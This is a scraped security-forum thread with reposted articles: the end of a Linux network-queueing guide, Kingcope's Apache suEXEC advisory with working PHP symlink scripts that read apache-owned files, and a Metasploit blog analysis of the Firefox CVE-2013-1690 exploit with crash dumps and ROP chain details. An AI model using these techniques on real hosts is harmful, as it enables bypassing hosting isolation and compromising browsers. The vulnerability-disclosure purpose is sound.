this variable control? This wasn’t clear to me so I spent some time spelunking in the kernel source. From what I can tell, the txqueuelen is only used as a default queue length for some of the queueing disciplines. Specifically: pfifo_fast (Linux default queueing discipline) sch_fifo sch_gred sch_htb (only for the default queue) sch_plug sch_sfb sch_teql Looking back at Figure 1, the txqueuelen parameter controls the size of the queues in the Queueing Discipline box for the QDiscs listed above. For most of these queueing disciplines, the “limit” argument on the tc command line overrides the txqueuelen default. In summary, if you do not use one of the above queueing disciplines or if you override the queue length then the txqueuelen value is meaningless. As an aside, I find it a little confusing that the ifconfig command shows low level details of the network interface such as the MAC address but the txqueuelen parameter refers to the higher level QDisc layer. It seems more appropriate for that ifconfig would show the driver queue size. The length of the transmission queue is configured with the ip or ifconfig commands. [root@alpha dan]# ip link set txqueuelen 500 dev eth0 Notice that the ip command uses “txqueuelen” but when displaying the interface details it uses “qlen” – another unfortunate inconsistency. Queueing Disciplines As introduced earlier, the Linux kernel has a large number of queueing disciplines (QDiscs) each of which implements its own packet queues and behaviour. Describing the details of how to configure each of the QDiscs is out of scope for this article. For full details see the tc man page (man tc). You can find details for each QDisc in ‘man tc qdisc-name’ (ex: ‘man tc htb’ or ‘man tc fq_codel’). LARTC is also a very useful resource but is missing information on newer features. Below are a few tips and tricks related to the tc command that may be helpful: The HTB QDisc implements a default queue which receives all packets if they are not classified with filter rules. Some other QDiscs such as DRR simply black hole traffic that is not classified. To see how many packets were not classified properly and were directly queued into the default HTB class see the direct_packets_stat in “tc qdisc show”. The HTB class hierarchy is only useful for classification not bandwidth allocation. All bandwidth allocation occurs by looking at the leaves and their associated priorities. The QDisc infrastructure identifies QDiscs and classes with major and minor numbers which are separated by a colon. The major number is the QDisc identifier and the minor number the class within that QDisc. The catch is that the tc command uses a hexadecimal representation of these numbers on the command line. Since many strings are valid in both hex and decimal (ie 10) many users don’t even realize that tc uses hex. See one of my tc scripts for how I deal with this. If you are using ADSL which is ATM (most DSL services are ATM based but newer variants such as VDSL2 are not always) based you probably want to add the “linklayer adsl” option. This accounts for the overhead which comes from breaking IP packets into a bunch of 53-byte ATM cells. If you are using PPPoE then you probably want to account for the PPPoE overhead with the ‘overhead’ parameter. TCP Small Queues The per-socket TCP queue limit can be viewed and controlled with the following /proc file: /proc/sys/net/ipv4/tcp_limit_output_bytes My understanding is that you should not need to modify this value in any normal situation. Oversized Queues Outside Of Your Control Unfortunately not all of the oversized queues which will affect your Internet performance are under your control. Most commonly the problem will lie in the device which attaches to your service provider (eg DSL or cable modem) or in the service providers equipment itself. In the later case there isn’t much you can do because there is no way to control the traffic which is sent towards you. However in the upstream direction you can shape the traffic to slightly below the link rate. This will stop the queue in the device from ever having more than a couple packets. Many residential home routers have a rate limit setting which can be used to shape below the link rate. If you are using a Linux box as a router, shaping below the link rate also allows the kernel’s queueing features to be effective. You can find many example tc scripts online including the one I use with some related performance results. Summary Queueing in packet buffers is a necessary component of any packet network both within a device and across network elements. Properly managing the size of these buffers is critical to achieving good network latency especially under load. While static buffer sizing can play a role in decreasing latency the real solution is intelligent management of the amount of queued data. This is best accomplished through dynamic schemes such as BQL and active queue management (AQM) techniques like Codel. This article outlined where packets are queued in the Linux network stack, how features related to queueing are configured and provided some guidance on how to achieve low latency. Related Links Controlling Queue Delay – A fantastic explanation of network queueing and an introduction to the Codel algorithm. Presentation of Codel at the IETF – Basically a video version of the Controlling Queue Delay article. Bufferbloat: Dark Buffers in the Internet – Early article Bufferbloat article. Linux Advanced Routing and Traffic Control Howto (LARTC) – Probably still the best documentation of the Linux tc command although it’s somewhat out of date with respect to new features such as fq_codel. TCP Small Queues on LWN Byte Queue Limits on LWN Thanks Thanks to Kevin Mason, Simon Barber, Lucas Fontes and Rami Rosen for reviewing this article and providing helpful feedback. Sursa: Queueing in the Linux Network Stack | Dan Siemon
  22. Da trimiteti-ne un PM cu IP-urile de pe care nu puteti accesa forumul, deoarece avem mici probleme tehnice cu globurile de cristal pe care le foloseam...
  23. [h=1]Apache suEXEC Privilege Elevation / Information Disclosure[/h] Apache suEXEC privilege elevation / information disclosure Discovered by Kingcope/Aug 2013 The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs. With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file- system of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user- id inside a suEXEC configured environment. Take for example this apache owned file and the php script that follows. $ ls -la /etc/testapache -rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache only user www-data should be able to read this file. $ cat test.php <?php system("id; cat /etc/testapache"); ?> When calling the php file using a webbrowser it will show... uid=1002(example) gid=1002(example) groups=1002(example) because the php script is run trough suEXEC. The script will not output the file requested because of a permissions error. Now if we create a .htaccess file with the content... Options Indexes FollowSymLinks and a php script with the content... <?php system("ln -sf / test99.php"); symlink("/", "test99.php"); // try builtin function in case when //system() is blocked ?> in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'. A request to test99.php/etc/testapache done with a web browser shows.. voila! read with the apache uid/gid The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case. Version notes. Assumed is that all Apache versions are affected by this bug. apache2 -V Server version: Apache/2.2.22 (Debian) Server built: Mar 4 2013 21:32:32 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 32-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) Server compiled with.... -D APACHE_MPM_DIR="server/mpm/worker" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="/etc/apache2" -D SUEXEC_BIN="/usr/lib/apache2/suexec" -D DEFAULT_PIDLOG="/var/run/apache2.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="mime.types" -D SERVER_CONFIG_FILE="apache2.conf" Cheers, /Kingcope Sursa: Apache suEXEC Privilege Elevation / Information Disclosure
  24. Here's that FBI Firefox Exploit for You (CVE-2013-1690) Posted by sinn3r in Metasploit on Aug 7, 2013 5:02:42 PM Hello fellow hackers, I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you. During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability. Brief Analysis The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here. We began with a crash with a modified version of the PoC: eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 xul!DocumentViewerImpl::Stop+0x58: 014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:72622f2f=???????? EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc: ... bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g" ... Addr=0x07adb980, Size=0x000000c4 ChildEBP RetAddr 0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57] 0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer The callstack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function. When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store that: nsresult NS_NewContentViewer(nsIContentViewer** aResult) { *aResult = new DocumentViewerImpl(); NS_ADDREF(*aResult); return NS_OK; } In the PoC, window.stop() is used repeatedly that's meant to stop document parsing, except they're actually not terminated, just hang. Eventually this leads to some sort of exhaustion and allows the script to continue, and the DocumentViewerImpl object lives on. And then we arrive to the next line: ownerDocument.write(). The ownerDocument.write() function is used to write to the parent frame, but the real purpose of this is to trigger xul!nsDocShell:: Destroy, which deletes DocumentViewerImpl: Free DocumentViewerImpl at: 0x073ab940ChildEBP RetAddr 000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345] What happens next is after the ownerDocument.write() finishes, one of the window.stop() calls that used to hang begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function will access the invalid memory, and crashes. At this point you might see two different racy crashes: Either it's accessing some memory that doesn't seem to be meant for that CALL, just because that part of the memory happens to fit in there. Or you crash at mov ecx, dword ptr [eax] like the following: 0:000> reax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24aceip=014c51ed esp=000b4510 ebp=000b4514 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206xul!DocumentViewerImpl::Stop+0x58:014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 0:000> u . L3014c51ed 8b08 mov ecx,dword ptr [eax]014c51ef 50 push eax014c51f0 ff5104 call dword ptr [ecx+4] However, note the crash doesn't necessarily have to end in xul!nsDocumentViewer::Stop, because in order to end up this in code path, it requires two conditions, as the following demonstrates: DocumentViewerImpl::Stop(void) { NS_ASSERTION(mDocument, "Stop called too early or too late"); if (mDocument) { mDocument->StopDocumentLoad(); } if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry) mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode); mStopped = true; if (!mLoaded && mPresShell) { // These are the two conditions that must be met // If you're here, you will crash nsCOMPtrshellDeathGrip(mPresShell); mPresShell->UnsuppressPainting(); } return NS_OK; } We discovered the above possibility due to the exploit in the wild using a different path to "call dword ptr [eax+4BCh]" in function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives in xul!nsDocumentViewer::Stop. It's also using an information leak to properly craft a NTDLL ROP chain specifically for Windows 7. The following example based on the exploit in the wild should demonstrate this, where we begin with the stack pivot: eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001 eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 xul!xpc_LocalizeContext+0x3ca3f: 66f05c12 ff90bc040000 call dword ptr [eax+4BCh] ds:0023:120a44d4=33776277 We can see that the pivot is a XCHG EAX,ESP from NTDLL: 0:000> u 77627733 L6 ntdll!__from_strstr_to_strchr+0x9b: 77627733 94 xchg eax,esp 77627734 5e pop esi 77627735 5f pop edi 77627736 8d42ff lea eax,[edx-1] 77627739 5b pop ebx 7762773a c3 ret After pivoting, it goes through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution: 0:000> dd /c1 esp L9 120a4024 77625f18 ; ntdll!ZwProtectVirtualMemory 120a4028 120a5010 120a402c ffffffff 120a4030 120a4044 120a4034 120a4040 120a4038 00000040 120a403c 120a4048 120a4040 00040000 120a4044 120a5010 Note: The original exploit does not seem to go against Mozilla Firefox 17 (or other buggy versions) except for Tor Browser, but you should still get a crash. We figured whoever wrote the exploit didn't really care about regular Firefox users, because apparently they got nothing to hide Metasploit Module Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned. Meanwhile, feel free to play FBI in your organization, excise that exploit on your next social engineering training campaign. Mitigation Protecting against this exploit is typically straightforward: All you need to do is upgrade your Firefox browser (or Tor Bundle Browser, which was the true target of the original exploit). The vulnerability was patched and released by Mozilla back in late June of 2013, and the TBB was updated a couple days later, so the world has had a little over a month to get with the patched versions. Given that, it would appear that the original adversaries here had reason to believe that at least as of early August of 2013, their target pool had not patched. If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since the people using Tor services often are relying on read-only media, like a LiveCD or a RO virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks we have a case where good security advice (don't save anything on your secret operating system) got turned around into a poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690
  25. Decryptare a cheilor? Sau te referi la posibilitatea de a sparge prin bruteforce chei pe 128 de biti? Aici pot da un exemplu simplu si concret: daca NSA are nevoie de 1 milion de dolari pentru a cumpara GPU-uri/CPU-uri pentru a putea sparge rapid o cheie AES pe 128 de biti, pentru a sparge o cheie pe 256 de biti ar avea nevoie de 1 milion * 1 milion = 1000 de miliarde de dolari (1.000.000.000.000 de $).
×
×
  • Create New...